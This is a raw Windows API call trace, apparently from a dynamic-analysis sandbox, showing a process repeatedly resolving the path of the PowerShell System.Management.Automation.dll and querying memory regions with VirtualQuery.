	[0040.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.279] GetLastError () returned 0x0
	[0040.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.279] GetLastError () returned 0x0
	[0040.279] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.279] GetLastError () returned 0x0
	[0040.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.280] GetLastError () returned 0x0
	[0040.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.280] GetLastError () returned 0x0
	[0040.280] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.280] GetLastError () returned 0x0
	[0040.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.280] GetLastError () returned 0x0
	[0040.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.280] GetLastError () returned 0x0
	[0040.280] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.281] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.281] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.282] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.283] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.283] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.283] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.283] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.283] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.284] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.284] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.285] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.285] VirtualQuery (in: lpAddress=0x25ceec, lpBuffer=0x25deec, dwLength=0x1c | out: lpBuffer=0x25deec*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.285] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.286] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.287] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.287] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.287] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x3d201dad, Data2=0xf8e6, Data3=0x48c3, Data4=([0]=0x8c, [1]=0x7f, [2]=0x5d, [3]=0xdb, [4]=0x8c, [5]=0xd3, [6]=0xcc, [7]=0xa8))) returned 0x0
	[0040.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.287] GetLastError () returned 0x0
	[0040.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.287] GetLastError () returned 0x0
	[0040.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.287] GetLastError () returned 0x0
	[0040.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.287] GetLastError () returned 0x0
	[0040.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.287] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.288] GetLastError () returned 0x0
	[0040.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.289] GetLastError () returned 0x0
	[0040.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.292] GetLastError () returned 0x0
	[0040.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.292] GetLastError () returned 0x0
	[0040.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.292] GetLastError () returned 0x0
	[0040.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.292] GetLastError () returned 0x0
	[0040.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.292] GetLastError () returned 0x0
	[0040.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.292] GetLastError () returned 0x0
	[0040.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.292] GetLastError () returned 0x0
	[0040.293] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.293] GetLastError () returned 0x0
	[0040.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.293] GetLastError () returned 0x0
	[0040.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.293] GetLastError () returned 0x0
	[0040.293] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.294] GetLastError () returned 0x0
	[0040.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.294] GetLastError () returned 0x0
	[0040.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.294] GetLastError () returned 0x0
	[0040.294] VirtualQuery (in: lpAddress=0x25d0b0, lpBuffer=0x25e0b0, dwLength=0x1c | out: lpBuffer=0x25e0b0*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.294] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.295] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.296] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.297] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.297] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.297] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
